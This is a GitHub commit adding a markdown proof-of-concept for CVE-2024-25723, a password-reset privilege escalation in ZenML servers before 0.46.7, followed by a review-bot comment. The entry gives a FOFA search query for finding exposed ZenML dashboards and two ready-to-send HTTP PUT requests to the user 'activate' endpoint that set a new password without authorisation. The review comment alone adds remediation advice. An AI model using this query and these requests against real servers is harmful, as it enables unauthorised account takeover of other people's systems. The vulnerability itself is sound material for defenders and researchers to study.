Create ZenML服务器远程权限提升漏洞(CVE-2024-25723).md

wy876 2024-04-28 20:23:53 +08:00 committed by GitHub
parent d13391bfa2
commit dc64090fa1
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194


@ -0,0 +1,38 @@
## ZenML服务器远程权限提升漏洞(CVE-2024-25723)
ZenML服务器远程权限提升漏洞CVE-2024-25723存在于Python的0.46.7之前的ZenML机器学习包中的ZenML服务,漏洞源于/*/{user_name_or_id}/activate REST API 端点允许基于有效用户名和请求正文中的新密码进行访问可导致未授权用户远程权限提升可直接重置任意ZenML账户密码。
## fofa
```
title=="ZenML - Dashboard"
```
## poc
```
PUT /api/v1/users/*/activate HTTP/1.1
Host:
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 31
{"password": "Ldwk@20240426"}
PUT /api/v1/users/default/activate HTTP/1.1
Host:
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 31
{"password": "Ldwk@20240426"}
```
![image](https://github.com/wy876/POC/assets/139549762/698ab566-b17e-48c0-954d-1dd21f795405)
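Review bot: the new file goes from the description straight to `## fofa` and `## poc` and ends on a screenshot, with no remediation or detection section, so a reader learns how the `/activate` endpoint is abused but not what to do about it. The description already gives the fix boundary (ZenML before 0.46.7 is affected), so a short section after the description should say to upgrade to 0.46.7 or later and to review access logs for unauthenticated `PUT /api/v1/users/<name>/activate` requests, which is the request shape shown under `## poc`. Two smaller points in the same hunk: the description is a single unpunctuated sentence that runs cause, impact and affected version together and would read better split into those three parts, and the sample body carries a literal password value where a labelled placeholder would do. The description also writes the path as `/*/{user_name_or_id}/activate` while the first sample request uses a literal `*` in the user position; a line stating which form is meant would remove the ambiguity.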